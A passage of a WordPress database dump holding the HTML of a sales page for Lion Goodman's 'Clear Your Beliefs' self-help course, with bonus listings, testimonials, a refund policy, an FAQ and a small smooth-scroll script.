complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. \n\nIt''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<h1 id="package"></h1>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top"><font color="#2E2EFE">Up To Top</a></font></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You''ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n	<strong>=> <em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n	<strong>=> <em>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\n	<strong>=> <em>Your Childhood Bonding Pattern Assessment:</em></strong> The LoveStyle Profile Quiz\n	<strong>=> <em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\n	<strong>=> <em>Clear Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> Multimedia eBook by Lion Goodman (PDF)\n	<strong>=> <em>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n	<strong>=> <em>Professional Coaching Sessions:</strong> </em> Optional.\n\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: "<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God."</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p></div>\n\n<div class="parg-text"><p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p></div>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p></div>\n\n<div class="parg-text"><p><strong>Q: How long will I have access to the course?</strong></p></div>\n\n<div class="parg-text"><p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: Are there scholarships available?</strong></p></div>\n\n<div class="parg-text"><p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">info@clearyourbeliefs.com</a></font>, with a description of your circumstances and your offer of what you can pay.</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your refund policy?</strong></p></div>\n\n<div class="parg-text"><p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: How can I reach Customer Support?</strong></p></div>\n\n<div class="parg-text"><p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your Privacy Policy?</strong></p></div>\n\n<div class="parg-text"><p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" ><FONT COLOR="#2E2EFE">ClearYourBeliefs.com</a></font>, <a href="http://www.BeliefCloset.com" target="_blank" ><FONT COLOR="#2E2EFE">BeliefCloset.com</a></font>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" ><FONT COLOR="#2E2EFE">ConfusedAboutLove.com.</a></font></p></div>\n\n<div class="parg-text"><p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p></div>\n\n<div class="parg-text"><p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p></div>\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\njQuery(function(){jQuery(''a[href*=#]:not([href=#])'').click(function() {if (location.pathname.replace(/^//,'''')+''/'' == this.pathname.replace(/^//,'''') && location.hostname == this.hostname){var target = jQuery(this.hash);target = target.length ? target : jQuery(''[name='' + this.hash.slice(1) +'']'');if (target.length){jQuery(''html,body'').animate({scrollTop: target.offset().top}, 1000);return false;}}});});\n// ]]>\n</script>";s:6:"filter";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:2:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:2:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1935, 2222, 'panels_data', 'a:3:{s:7:"widgets";a:3:{i:0;a:4:{s:5:"title";s:22:"Video and welcome text";s:4:"text";s:3003:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/129244809?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n<div class="quot" style="text-align: center; margin: 0px auto ! important;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nLearn to change your beliefs, and your limitations will disappear.\nYour possibilities will then become unlimited.</strong></span>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\n<div class="clear"></div>\n\n&nbsp;\n\n<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>\n\n&nbsp;\n\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.\n\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:12:"Ebook button";s:4:"text";s:370:"<h1><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook1.png"><img src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook1.png" alt="clear your beliefs" width="1" height="1" class="alignleft size-medium wp-image-1475" /></a><a class="big button blue" href="http://clearyourbeliefs.com/ebook/" target="_blank">Register for FREE Ebook</a></h1>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:72860:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/129244809?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n<div class="quot" style="text-align: center; margin: 0px auto ! important;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nLearn to change your beliefs, and your limitations will disappear.\nYour possibilities will then become unlimited.</strong></span>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\n<div class="clear"></div>\n\n&nbsp;\n\n<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>\n\n&nbsp;\n\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.\n\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/ebook/" target="_blank" >Register for FREE Ebook</a><br /></center></h1>\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.\n\n<strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/program/#package" >Okay, I''m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I''ll get,<br />and how much it costs...</a><br /></center></h1>\n&nbsp;\n<h1>Why Does This Happen?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\n\nNeuroscientists call the brain''s ability to change over time "neuroplasticity."\n\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\n\n&nbsp;\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\n\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\n\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" 